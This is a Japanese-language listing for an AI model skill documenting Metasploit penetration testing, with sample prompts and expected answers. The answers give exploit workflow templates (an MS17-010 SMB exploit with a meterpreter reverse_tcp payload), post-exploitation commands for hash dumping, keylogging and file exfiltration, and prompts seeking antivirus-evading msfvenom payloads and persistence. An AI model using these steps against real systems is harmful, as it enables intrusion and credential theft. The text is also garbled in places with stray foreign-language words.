metasploit-framework
ClaudeでMetasploitペネストレーションテストをマスターする
セキュリティ専門家は、承認されたペネストレーションテストワークフローに関する専門的ガイダンスを必要としています。このスキルは、悪用.Payload Generation、法的ベストプラクティスを伴う、ポストエクスプロイト活動を含む包括的なMetasploit Frameworkドキュメントを提供します。
スキルZIPをダウンロード
Claudeでアップロード
設定 → 機能 → スキル → スキルをアップロードへ移動
オンにして利用開始
テストする
「metasploit-framework」を使用しています。 msfconsoleを起動してSMBエクスプロイトを検索する方法は?
期待される結果:
msfconsoleを起動してSMBエクスプロイトを検索するには: quietモードで'msfconsole -q'でコンソールを起動し次に'search type:exploit smb'を使用してSMB関連のエクスプロイトモジュールを検索できます。MS17-010 SMB脆弱性エクスプロイトspecificallyを поиск で検索することもできます。選択する前に'info [module_path]'でモジュールの詳細を確認してください。
「metasploit-framework」を使用しています。 meterpreter.Payloadでエクスプロイトを構成して実行する手順は何ですか?
期待される結果:
6つのステップでエクスプロイトを構成:首先'use [module_path]'を使用してエクスプロイトを選択します。'show options'を実行して必要な設定を表示します。'set RHOSTS [target_ip]'と'set RPORT [port]'でターゲットパラメータを設定します。'set PAYLOAD windows/x64/meterpreter/reverse_tcp'で.Payloadを選択します。リスナーは'set LHOST [your_ip]'と'set LPORT [port]'で設定します。最後に'exploit'を実行してMeterpreterセッションを確立します。
「metasploit-framework」を使用しています。 セッションを得た後に使用するMeterpreterコマンドは何ですか?
期待される結果:
Meterpreterセッションを確立したら、'sysinfo'と'getuid'を実行してアクセスレベルを理解します。'hashdump'を使用してパスワードハッシュを抽出し'ps'で実行中のプロセスを表示します。より安定したプロセスに移動するには'migrate [PID]'を実行します。データ持ち出しには'download [file]'または'upload [file]'を使用します。'screenshot'でデスクトップをキャプチャするか'keyscan_start'でキーログ記録を開始します。'background'でセッションをバックグラウンド化してmsfconsoleに戻ります。
セキュリティ監査
中リスクThis skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.
中リスクの問題 (1)
低リスクの問題 (3)
リスク要因
⚙️ 外部コマンド (4)
🌐 ネットワークアクセス (3)
📁 ファイルシステムへのアクセス (1)
品質スコア
作れるもの
ペネストレーションテストワークフローガイダンス
承認されたペネストレーション engagement 中、セキュリティ専門家はMetasploit Framework機能をナビゲートし、適切なエクスプロイトモジュールを選択し.Payloadを設定し、法的範囲内でポストエクスプロイト活動を行うためにこのスキルを使用します。
セキュリティ評価ドキュメント
レッドチームメンバーは、セキュリティ評価レポートでMetasploitの使用を文書化するためにこのスキルを活用し、適切なコマンド構文、モジュール選択、ポストエクスプロイト活動をクライアント向け成果物として正確に記録します。
セキュリティトレーニングのための教育リソース
サイバーセキュリティ学生と認定候補者は、このスキルを使用してMetasploit Frameworkの概念を学び、ラボ環境でペネストレーションテストワークフローを練習し、OSCP、CEH、PTXなどの認定試験に備えます。
これらのプロンプトを試す
Windowsターゲット用のSMB脆弱性に対して、適切なMetasploitエクスプロイトモジュールを検索して選択する方法は?
RHOSTS、LHOST、必要なオプションの設定を含む、meterpreter reverse_tcp.Payloadでeternalblueエクスプロイトを構成する手順をガイドしてください。
Meterpreterセッションを確立した後、承認されたペネストレーションテスト中にターゲットシステムを列挙し、資格情報を取得し、永続性を維持するために使用するコマンドは何ですか?
アンチウイルス検出を回避するためのエンコードを含む、リバースTCP接続を持つWindows実行可能.Payloadを作成するためのmsfvenomコマンドを生成してください。
ベストプラクティス
- Metasploitを使用したペネストレーションテスト活動を実施する前に、常に書面による承認を得てください
- エクスプロイトを実行する前に'check'コマンドを使用してターゲットの脆弱性を確認し、中断を最小限に抑えてください
- 本番評価ターゲットに展開する前に、分離されたラボ環境で.Payloadをテストしてください
- ペネストレーションテストレポートに含めるために、すべてのコマンド、結果、発見事項を文書化してください
- 可能な場合はreverse_tcpの代わりに暗号化されたreverse_https.Payloadを使用し、ネットワーク監視を回避してください
- アクセスを維持するために、セッションをバックグラウンド化し、プロセスを即座に移行してください
回避
- 明示的な書面による承認なしにシステムでMetasploitエクスプロイトを使用しないでください法は侵します
- 適切な偵察と脆弱性確認なしにターゲットに対してすべてのエクスプロイトを順番に実行しないでください
- ドキュメントやトレーニング中にサンプルコマンドで本番システムやパブリックIPアドレスを使用しないでください
- 評価後にアクティブなMeterpreterセッションを放置したり Properly に閉じたりしないでください
- 最初に回避技術をテストなしにアンチウイルスによって簡単に検出されるエンコードされていない.Payloadの使用を避けてください